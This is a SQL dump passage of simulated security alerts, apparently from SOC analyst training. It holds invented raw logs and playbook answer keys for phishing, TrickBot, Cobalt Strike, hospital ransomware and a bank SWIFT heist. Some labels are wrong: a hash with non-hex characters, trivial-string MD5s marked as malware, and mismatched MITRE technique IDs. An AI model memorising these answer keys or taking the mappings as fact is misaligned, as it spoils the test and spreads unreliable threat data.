'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"login-secure-portal.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Analysis Service\",\"verdict\":\"malicious\",\"details\":\"Domain registered recently and flagged for phishing.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://login-secure-portal.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"URL is hosting a phishing login page.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Database\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known phishing page template.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (287, 'OAuth Token Abuse Technique Detected', 'high', 'EDR', 'APT28 uses OAuth token abuse to maintain access to compromised accounts, which enables them to exfiltrate sensitive data without needing user passwords.', 'Persistence', 'T1550.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:32Z\",\"event_id\":\"evt12345\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"username\":\"j.doe@company.com\",\"oauth_token\":\"ya29.GlsBv...Xw3Fw\",\"action\":\"token_use\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"sensitive_data.docx\",\"user_agent\":\"Mozilla/5.0\",\"event_description\":\"OAuth token used for accessing cloud storage\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_feed\",\"verdict\":\"malicious\",\"details\":\"Known APT28 IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_db\",\"verdict\":\"internal\",\"details\":\"Employee email address\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file hash with potential data exfiltration\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (288, 'Disinformation Campaign Planning Uncovered', 'high', 'Threat Intelligence Platform', 'Analysts have uncovered a coordinated disinformation campaign through leaked communications from APT28 operatives. The campaign aims to discredit political figures and manipulate election outcomes using fake news distribution and social media manipulation.', 'Information Operations', 'T1027 - Obfuscated Files or Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"source_ip\":\"185.92.220.50\",\"destination_ip\":\"192.168.1.105\",\"malicious_filename\":\"election_strategy_2023.pdf\",\"hash_sha256\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"username\":\"jdoe\",\"action\":\"file_download\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"description\":\"Leaked document detailing plans for disinformation campaign.\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT28 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"8a7f5e3c1d4f8e1b6c3d8f7a3e2d4c5b6a1f7e8d5c2b3a4d8e3f7c1b6d2a7f9e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"election_strategy_2023.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Reports\",\"verdict\":\"suspicious\",\"details\":\"File used in the distribution of disinformation content.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (289, 'Phishing Email Detected', 'medium', 'Email Gateway', 'A phishing email was detected targeting hospital staff. The email contains a malicious link designed to download TrickBot malware upon clicking.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"email_subject\":\"Important Update Required\",\"sender_email\":\"attacker@example.com\",\"recipient_email\":\"staff@hospital.org\",\"malicious_link\":\"http://malicious-link.com/download\",\"attachment\":\"none\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"update-instructions.html\"}', '2025-12-31 15:22:50', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing email address associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"URL associated with TrickBot malware distribution.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"suspicious\",\"details\":\"IP address flagged for suspicious activity in recent phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to TrickBot malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"update-instructions.html\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (290, 'TrickBot Malware Execution', 'high', 'EDR', 'TrickBot malware was executed on an employee\'s workstation, allowing the attacker to establish a foothold in the network. The malware is designed to harvest credentials and facilitate further attacks.', 'Malware', 'TA0002 - Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:16Z\",\"event_type\":\"malware_execution\",\"src_ip\":\"192.168.1.45\",\"dest_ip\":\"34.210.123.158\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"5678\",\"file_hash\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\trickbot.exe\",\"detected_by\":\"EDR Agent\",\"malicious_score\":95}', '2025-12-31 15:22:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"34.210.123.158\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"This IP address has been associated with TrickBot C2 servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f0a2f5e4d3a9b5c7f6e9df123456789\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot malware hash.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with TrickBot malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Systems\",\"verdict\":\"internal\",\"details\":\"Username of the employee whose workstation was compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (291, 'Persistence Mechanism Identified', 'high', 'EDR', 'The attacker has established a persistence mechanism on the compromised system using TrickBot. This allows them to maintain access even after system reboots.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-24T14:23:52Z\",\"event_id\":\"12345\",\"hostname\":\"victim-pc\",\"user\":\"jdoe\",\"process_name\":\"trickbot.exe\",\"process_id\":\"6789\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TrickBot\",\"registry_value\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"command_line\":\"\\\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\trickbot.exe\\\" --silent\"}', '2025-12-31 15:22:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal company IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious_ip_database\",\"verdict\":\"malicious\",\"details\":\"Known TrickBot command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with TrickBot malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"trickbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"malicious\",\"details\":\"Executable linked to TrickBot malware\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"clean\",\"details\":\"Valid user in the company directory\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (292, 'Cobalt Strike Beacon Detected', 'high', 'Network Traffic Analysis', 'The attacker deploys Cobalt Strike beacons to move laterally, targeting critical systems within the hospital network to spread the ransomware.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:53Z\",\"source_ip\":\"193.161.35.75\",\"destination_ip\":\"10.10.15.23\",\"protocol\":\"HTTP\",\"uri\":\"/stager\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"beacon.exe\",\"username\":\"janedoe\",\"action\":\"download\"}', '2025-12-31 15:22:50', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"193.161.35.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known Cobalt Strike command and control server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal hospital network endpoint\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Cobalt Strike payload\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"beacon.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used in lateral movement\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"janedoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected activity from this user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', 'NULL', 1, 0, NULL), (293, 'Ransomware Encryption Initiated', 'critical', 'EDR', 'The ransomware has been executed across the hospital\'s network, encrypting patient data and rendering systems unusable. Immediate focus is required on data recovery and remediation.', 'Exfiltration', 'T1486: Data Encrypted for Impact', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:35:21Z\",\"event_id\":\"12345\",\"source_ip\":\"198.51.100.23\",\"target_ip\":\"10.0.0.25\",\"username\":\"hospital_admin\",\"file_affected\":\"patient_records.dat\",\"file_hash\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"action\":\"encrypt\",\"process_name\":\"ransomware.exe\",\"process_id\":\"6789\",\"severity\":\"critical\"}', '2025-12-31 15:22:50', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known ransomware command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Hospital network server being targeted.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a3f5d6e8b9c2d4a1e9f8b6c4d5e9a2b3\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware strain.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"patient_records.dat\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical patient data file targeted for encryption.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hospital_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Admin account used to execute the ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (294, 'Initial Access via Spear Phishing Campaign', 'high', 'Email Gateway', 'An email containing a malicious attachment was sent to key personnel within the bank, appearing as an urgent internal communication. The attachment, if opened, installs malware to gain access to the internal network.', 'Phishing', 'T1566.001 - Phishing: Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"email_subject\":\"Urgent: Updated Security Protocols\",\"sender_email\":\"it-security@bank.com\",\"recipient_email\":\"j.doe@bank.com\",\"attachment_name\":\"SecurityUpdate.docx\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"source_ip\":\"203.0.113.45\",\"recipient_ip\":\"10.0.1.15\",\"smtp_id\":\"<20231005142345.1.1234567890@bank.com>\"}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"it-security@bank.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"suspicious\",\"details\":\"Email domain recently used in phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with trojans.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (295, 'Malware Execution and Credential Harvesting', 'high', 'EDR', 'The malware was executed on a compromised system, allowing attackers to harvest credentials of bank clerks and administrators. This activity was detected following a successful phishing attempt, which is pivotal for attackers to gain further access to critical financial systems.', 'Malware', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:58Z\",\"event_type\":\"execution\",\"hostname\":\"finance-dept-pc1\",\"internal_ip\":\"192.168.10.45\",\"external_ip\":\"203.0.113.15\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"filename\":\"credential_harvester.exe\",\"executing_user\":\"jdoe\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\credential_harvester.exe\",\"detected_by\":\"EDR\",\"status\":\"malicious\",\"os\":\"Windows 10\",\"process_id\":4567}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash matches a known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credential_harvester.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"malicious\",\"details\":\"Suspicious executable used for credential harvesting.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (296, 'Lateral Movement through Network Exploitation', 'high', 'Network Monitoring', 'Using the harvested credentials and specialized administrative tools, the attackers move laterally across the network. They target systems responsible for managing ATM withdrawal limits and SWIFT transactions, setting the stage for unauthorized financial operations.', 'Lateral Movement', 'T1021', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.2.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"used_tool\":\"PsExec\",\"target_system\":\"ATM-Controller-02\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event\":\"Lateral movement detected from 192.168.1.105 to 10.0.2.15 using PsExec by user jdoe_admin.\"}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with previous attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Compromised administrative account used for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious administrative tools.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL), (297, 'Manipulation of ATM Withdrawal Limits and SWIFT Gateway', 'high', 'Transaction Monitoring System', 'Attackers have manipulated ATM withdrawal limits and initiated unauthorized SWIFT transactions, leading to substantial financial losses. This step marks the culmination of their heist.', 'Manipulation', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:35:00Z\",\"event_id\":\"ATM-TRANS-0004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"ATM Withdrawal Limit Manipulation\",\"transaction_id\":\"SWIFT-TRANS-8976\",\"file_hash\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"affected_account\":\"1234567890\",\"amount\":\"50000\",\"currency\":\"USD\"}', '2025-12-31 15:23:56', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP for financial fraud operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal bank system IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Admin account used during unauthorized transaction manipulations.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4e5b6c7d8f9a0b1c2d3e4f5g6h7i8j9k\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware used for financial fraud.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (302, 'Suspicious Process Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on a host using a known LOLBin technique. The executed script attempted to connect to a known Command and Control (C2) server.', 'Malware', 'T1218', 1, 'New', NULL, '{\"timestamp\":\"2023-10-01T15:24:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation-05\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"domain\":\"malicious-c2.example.com\"}', '2026-01-01 23:58:23', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malware\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process used a known LOLBin for execution and attempted to communicate with a malicious C2 server, confirming the malware presence.\"}', 'Intermediate', 'NULL', 1, 0, NULL), (303, 'Phishing Email with Malicious Link Detected', 'critical', 'Proofpoint', 'A phishing email was received containing a malicious link designed to harvest credentials. The email used a spoofed domain similar to a trusted one.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2023-10-02T09:15:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.45\",\"username\":\"asmith\",\"hostname\":\"email-server\",\"email_sender\":\"admin@trusfed-business.com\",\"url\":\"http://malicious-link.example.com\"}', '2026-01-01 23:41:20', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"admin@trusfed-business.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Email domain spoofing a legitimate business\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing site designed to steal credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email was confirmed to be a phishing attempt due to the malicious link and spoofed domain, matching known phishing patterns.\"}', 'Advanced', 'EDR', 1, 0, 'GOVERNMENT'); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (304, 'Spear Phishing Email Detected', 'medium', 'Email Gateway', 'A spear phishing email from a malicious source, disguised as a communication from a trusted partner, was detected targeting an employee in the finance department. The email contained a malicious attachment and a suspicious link.', 'Phishing', 'T1566.002', 